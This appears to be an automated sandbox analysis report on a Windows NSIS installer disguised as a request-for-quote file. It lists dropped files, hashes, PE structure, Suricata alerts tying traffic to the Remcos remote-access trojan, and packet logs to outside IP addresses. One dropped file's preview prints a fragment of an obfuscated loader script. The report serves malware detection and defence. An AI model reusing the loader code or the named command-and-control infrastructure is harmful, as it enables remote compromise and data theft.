                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Fenagles.Chi

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328703
                                                            Entropy (8bit):7.624008519921244
                                                            Encrypted:false
                                                            SSDEEP:6144:szmTsySRVs5zFkrZnR460uPbZndDVeCH0hHjKbF6ovOWY15VeTNq:A1AfkdnGl8bbHg+52LLV+q
                                                            MD5:A7F9D7683A801E46E88E7326809863E3
                                                            SHA1:D2766E2B71F103611971CB924AF246DF6A947B59
                                                            SHA-256:ECC7C894A817724E4841B23FD23290C67BFABB1B7C5ED1073E3EE02697F6B2FD
                                                            SHA-512:6318DFDA7E0B4A7EEACD84375733CFF20C4830AE16C93B9E26DAB93E51BA87B87DE5121DDA86A2AFF880B0B68C824F388BEF90B478D6F67C4D0B78FDD0411EB6
                                                            Malicious:false
                                                            Preview:.............................+..........+.......BBB........................}}....Z.RR....W...........s..NNN..222..s.......F....X......q.....www.@@@@@@@@@.......^..................<<....aaaa............................i..........................xx.........?....Q...`..W..........eeee.ff.................8.............h..................$$$$$$$$$$$$$$$$$$$................S......6.................................&...........h...............................@@@.....PPP...c...........;..............((...x....................A.....AAA....................jjjjj.........8...e...............W........z.......^..._..................6........jj................1..A..........L........X......................{........................MMMM.................66......0000........$..............4.J..............s........0..N..TTT.......TTT.......uuuu...UUU.UU.....~..........''...:::...............e......[..............T....c..........))).>..........@.66....................::.\\..SS......EE..h................uuu.

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Fldekagens.won

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4978097
                                                            Entropy (8bit):0.1587330501431333
                                                            Encrypted:false
                                                            SSDEEP:768:oe1c3080LtMUV9O6Ivcs/3cwrp3F96u4PtAbY6NBQAGuwtNYq5jzP9qy2IccGm5q:Fh7Sx
                                                            MD5:E10E4A4F5E9C6C25F30E6F229F5941F3
                                                            SHA1:0CA6DF1C6FB3497E2A8D74F808CC0F23B3295A1F
                                                            SHA-256:CF6A84E24A1F2104FFC6D00058FE72BC8FAD5A36F982503E1A7F1AAFFBEDCDE9
                                                            SHA-512:B7059A1F3D6D19E465DF570A29CC0B233EBF5EFC1E2C07DDBAC71ADC747E1602326B63E93FFB39F1BBA5D300CF394472EED4E8FD28FEBC0E579964FB0EF136DB
                                                            Malicious:false
                                                            Preview:.......................................................................................................g.......................................................................................................................................................................................................................L..........................................................................................................................................................................................................................j................................................................................................................................................................................................................................................................................................................................ ................................................................................#...........................................................

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Overrack2\afbagendes.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:ASCII text, with very long lines (395), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):4.247606033101229
                                                            Encrypted:false
                                                            SSDEEP:12:qHRqobbnuuNQHpX2gBsLD0kcc+W8R2JT+JPrwIAu4HoW/Q3It:qxqobbnuuNQHpagkF8wUSBrIoQ4t
                                                            MD5:D11C07A55FF09B0A2E0C9BCF181DD969
                                                            SHA1:621D61F1A8F8574548334E4F732B04410E1A964D
                                                            SHA-256:495BFCF071659DDB9BC7783981E1BC6E8FCD2CE81C6C31895D68BF9919B7665E
                                                            SHA-512:54FE8BBBF9FF90F5B0F9CDA6784C3B6AB8FA2D163BDC3FCE39F1FA30ADB3691AF9968DC50AE40DA27F0E18DF952D22040ED9318A88E545672D048B42C94CC3B6
                                                            Malicious:false
                                                            Preview:ankelknoglers udraabstegns hyperhypocrisy constantinian roheryn unendeavored forfdre decks barnet endepunktsjusteringernes masochisms twiniest..unionisation spidsborgernes ukuransnedskrivningerne quiche bizarreriets chirps confessionist.marocain berrugate classicise johannesbrd copart knocks,slagters jarldoemme generalizability rkereaktionre slitteskrues khedive vitilitigate,sojaskraa decimalskilletegn fanebrereder magus echidnidae skarre.missilformularens aftagende recontracting ciffertasterne tydningerne fagstudienvnenes recepturs,

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Overrack2\fictionise.res

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3811024
                                                            Entropy (8bit):0.15926420403649424
                                                            Encrypted:false
                                                            SSDEEP:768:HG4zGp2v5B9pNmzcIKyHhI8sz7YQcjekdzjECZsTbSmxOR46e5HIcOuWofyVRHXB:t/6
                                                            MD5:6BF42A0A5D506264C42F0A8FF53E718E
                                                            SHA1:8A33E324C152756DA8AA50E351B4C9C92458AB80
                                                            SHA-256:D8F4ECA0C0A30915ED44DB12CE1F356D3532E71E324B2B86FB71A61630FF16B7
                                                            SHA-512:5C1E92EA9CCAF82777A384CA868C319DD3400A910934F6B606FCC4A4E0F1EA6D52027D85169556F021432E0D6346223979D518689DA79A75EE61D046648056B2
                                                            Malicious:false
                                                            Preview:..........................................................................................................@...........................................................................................................................................................................................................................................................................................................................................&............................................................\..........................................................................................................................................................................................................................................@.........................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (4103), with CRLF, LF line terminators
                                                            Category:dropped
                                                            Size (bytes):67851
                                                            Entropy (8bit):5.200952359090072
                                                            Encrypted:false
                                                            SSDEEP:1536:5nwHnOdDQ4hfsf/cyOEmWjVallBMABHiZyrVMRk:hwudDYbfjVNZmV2k
                                                            MD5:1280D41310C4A2EEAE634EC8DC22FCC8
                                                            SHA1:D8A0986CD4FDFAAE54FFD0B3B015FECB343A93A9
                                                            SHA-256:8431F4E8DA30962CB0082804B30B01485FB8927E2CBE4012A321AA4E8F09AC1E
                                                            SHA-512:9644B502EFC90A956402AAAC90BE1961C48D897A74CE60326BA26FA459290F6C714366F2C56E7EF7C0FD31A6A51498D1EB2D74E7B0035F0ADFC5F9D24C5A0FC5
                                                            Malicious:true
                                                            Preview:$Labrose132=$disoriented;........$Picnometre = @'. ,echno.Cruddie$Boligk SSympatie SmleruvC riandeA.ticlirCrohvidiBrudentnCilies gInsuffilP desneyLandfstlIncorrimSilkeoreNatr umnIndte pn fellowy osbrvit.horepitRedemoni Rendejg Pe cust,oticer=Sintrin$SneppenT pdaterrunmargik KommunkAfkodereSlumptrnAcanthoaProtocoaDatakomlLeksikoeUdtvremnRecert eBouil.o;He ilei.AtionsvfDdvandeuA rophynAcrogamcUligevgt Obsk ri Char eo DetermnDelikat UncritiM ProdukeStabelprS erliniForbarmnEpizz agMassrenuMetroereI atinesKerneop Affinit(Calling$SemimalSNekkarse bambusv.ysstyreKvali irUnassumiKurtagenUdd,nneg overgelKlas ify skelet, Diapho$WeymoutS Sal,inuTredeles Miavt aTrindtbnAfstt lnDiolsdaeCaromsf5Overfar3forbere)Sondred Indbygg{Te rapn.underud. Stnket$ GeneraSEthnogreCystoidrEjeranddVaske laHersk.bbUnderf Bystend(Kl mrenCPronouniFodr ndoF,milien Hedgewo DisanicHelmut,r B,ankiaAutomatn HenotiiWavinglaSkovlvolBorduns Depreci'Stra feNHighnesoMessiasn LignineDgncentsCarc.sepOperat i fanden$Nnere rTCitro

                                                            C:\Users\user\AppData\Roaming\afdragsordning\Trachoma135\Sygehjlperens156.jou

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4452491
                                                            Entropy (8bit):0.15755416186137736
                                                            Encrypted:false
                                                            SSDEEP:768:dcQDlfI1V+H0C0cnDtbLdHPWfWYefayfCUel0BcvR+7D6xUtH1W0mtLhIplZAicU:xzpxZ
                                                            MD5:23FBA11F197C3671FEC5F037ED860A34
                                                            SHA1:00268C2C72B421CA022770C859FDA9C87610ED0B
                                                            SHA-256:09192DE63A90EA42794CCD244E51DE7F64EA2B4A59FF371B0DA6DD713DA0CC6A
                                                            SHA-512:B79F022A6FFCD7F697FA3FD878F9920AFB5C39F02F8B7799B5E240A94AE9881B43F2D62F1B26D867A9F71B17F9D71EDD3DE2871825381F679805B38722330DF0
                                                            Malicious:false
                                                            Preview:........................................Z...........................................................................................................................................................................................................................................................................................................................................................d.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.............................................................................................................................................................

                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                            Download File
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.779209859352386
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:RFQ NO 65-58003.exe
                                                            File size:839'544 bytes
                                                            MD5:e4e7b853e87922ff59bcae3527b206f9
                                                            SHA1:15e8dc7771a5b9ebeae4b64ccc20a8d9798158c2
                                                            SHA256:b4b7eab942bf5ffa93bef1444c82b059d3c18234bcec49df9ec2294bf0ec66bd
                                                            SHA512:92406ea4aa0b16b825a776756fd875cc1d224144666c56fe6a7fb3ca6d8f0090adeb3e6e1a07bddd83ef1e2b9dda382fa50738ccb78a3f3f73245a330da8be4c
                                                            SSDEEP:12288:3zpSYVj1vkBEu7i6rcdUYH+pIpHjGERkr1w0ZS8atGZnnBIjLNA8xrduQg9eC:9SYkWuO6dcQIpDJ2ZVnaFP5qEC
                                                            TLSH:23051281F714C997F8E3AE3D4E495E919F5069B8D480D30A21E93BAD3AF2730894A7C5
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

                                                            File Icon

                                                            Icon Hash:000204191163061d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x40344a
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=Behattet, E=Misforstaaelsernes@Brndforgiftninge.Bru, O=Behattet, L=Locust Valley, OU="Scholasm Maanedskortets Lfteparagraffers ", S=New York, C=US
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 23/04/2024 06:10:41 23/04/2025 06:10:41
                                                            Subject Chain
                                                            • CN=Behattet, E=Misforstaaelsernes@Brndforgiftninge.Bru, O=Behattet, L=Locust Valley, OU="Scholasm Maanedskortets Lfteparagraffers ", S=New York, C=US
                                                            Version:3
                                                            Thumbprint MD5:E6F7CCB478DEB87ACBB9BF461C91FD4A
                                                            Thumbprint SHA-1:2378829B38ACD98D8AE8B282E7E9856987802232
                                                            Thumbprint SHA-256:B3E9A7181DA2C5EC3C5F59ABF713A2CFE3AEA5B518EC2EB52246C63D704396D8
                                                            Serial:232D6846CEABAA60D5E84DBF91890837F1103974

                                                            Entrypoint Preview

                                                            Instruction
                                                            sub esp, 000002D4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebx, ebx
                                                            push 00008001h
                                                            mov dword ptr [esp+14h], ebx
                                                            mov dword ptr [esp+10h], 0040A230h
                                                            mov dword ptr [esp+1Ch], ebx
                                                            call dword ptr [004080B4h]
                                                            call dword ptr [004080B0h]
                                                            cmp ax, 00000006h
                                                            je 00007F9D30820C13h
                                                            push ebx
                                                            call 00007F9D30823D6Ch
                                                            cmp eax, ebx
                                                            je 00007F9D30820C09h
                                                            push 00000C00h
                                                            call eax
                                                            mov esi, 004082B8h
                                                            push esi
                                                            call 00007F9D30823CE6h
                                                            push esi
                                                            call dword ptr [0040815Ch]
                                                            lea esi, dword ptr [esi+eax+01h]
                                                            cmp byte ptr [esi], 00000000h
                                                            jne 00007F9D30820BECh
                                                            push ebp
                                                            push 00000009h
                                                            call 00007F9D30823D3Eh
                                                            push 00000007h
                                                            call 00007F9D30823D37h
                                                            mov dword ptr [0042A244h], eax
                                                            call dword ptr [0040803Ch]
                                                            push ebx
                                                            call dword ptr [004082A4h]
                                                            mov dword ptr [0042A2F8h], eax
                                                            push ebx
                                                            lea eax, dword ptr [esp+34h]
                                                            push 000002B4h
                                                            push eax
                                                            push ebx
                                                            push 004216E8h
                                                            call dword ptr [00408188h]
                                                            push 0040A384h
                                                            push 00429240h
                                                            call 00007F9D30823920h
                                                            call dword ptr [004080ACh]
                                                            mov ebp, 00435000h
                                                            push eax
                                                            push ebp
                                                            call 00007F9D3082390Eh
                                                            push ebx
                                                            call dword ptr [00408174h]
                                                            add word ptr [eax], 0000h

                                                            Rich Headers

                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x17788.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xcc7f00x788
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x61f10x62002ce901035717865394b5faeda5b43e0fFalse0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x203380x600df898dbdc013374b871e011dcd904b20False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x2b0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x500000x177880x178009a8320a105424ee3931a3b49e74f1e10False0.16107047872340424data3.87775241222699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x503b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.11695551875073938
                                                            RT_ICON0x60be00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.22240663900414936
                                                            RT_ICON0x631880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.29924953095684803
                                                            RT_ICON0x642300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.23480810234541577
                                                            RT_ICON0x650d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.23826714801444043
                                                            RT_ICON0x659800x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.24390243902439024
                                                            RT_ICON0x65fe80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.25
                                                            RT_ICON0x665500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5567375886524822
                                                            RT_ICON0x669b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.30510752688172044
                                                            RT_ICON0x66ca00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5
                                                            RT_DIALOG0x66dc80x140dataEnglishUnited States0.471875
                                                            RT_DIALOG0x66f080x11cdataEnglishUnited States0.6091549295774648
                                                            RT_DIALOG0x670280xc4dataEnglishUnited States0.5918367346938775
                                                            RT_DIALOG0x670f00x60dataEnglishUnited States0.7291666666666666
                                                            RT_GROUP_ICON0x671500x92dataEnglishUnited States0.6301369863013698
                                                            RT_VERSION0x671e80x25cdataEnglishUnited States0.5198675496688742
                                                            RT_MANIFEST0x674480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-18T11:05:13.562414+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649868212.162.149.9280TCP
                                                            2024-12-18T11:05:16.487668+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649874212.162.149.912404TCP
                                                            2024-12-18T11:05:18.671683+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649880212.162.149.912404TCP
                                                            2024-12-18T11:05:18.878131+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649881178.237.33.5080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 18, 2024 11:05:12.288048029 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:12.407604933 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:12.407720089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:12.408065081 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:12.527532101 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562342882 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562391043 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562407017 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562413931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.562444925 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.562452078 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.562465906 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562483072 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.562510967 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.562517881 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.600733042 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.600801945 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.600816011 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.600840092 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.600877047 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.600914955 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.600919962 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.600919962 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.600919962 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.600963116 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.682140112 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.682172060 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.682218075 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.682297945 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.753469944 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.753540993 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.753560066 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.753604889 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.757663012 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.757721901 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.757761955 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.757816076 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.766004086 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.766066074 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.766105890 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.766161919 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.774385929 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.774455070 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.774535894 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.774593115 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.782752991 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.782819033 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.782821894 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.782881021 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.791809082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.791873932 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.791873932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.791924000 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.797233105 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.797295094 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.797317028 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.797445059 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.805625916 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.805692911 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.805720091 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.805757999 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.814043045 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.814100027 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.814260960 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.814301968 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.822329044 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.822386026 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.822454929 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.822498083 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.829996109 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.830055952 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.830113888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:13.830163002 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:13.873193979 CET8049868212.162.149.92192.168.2.6
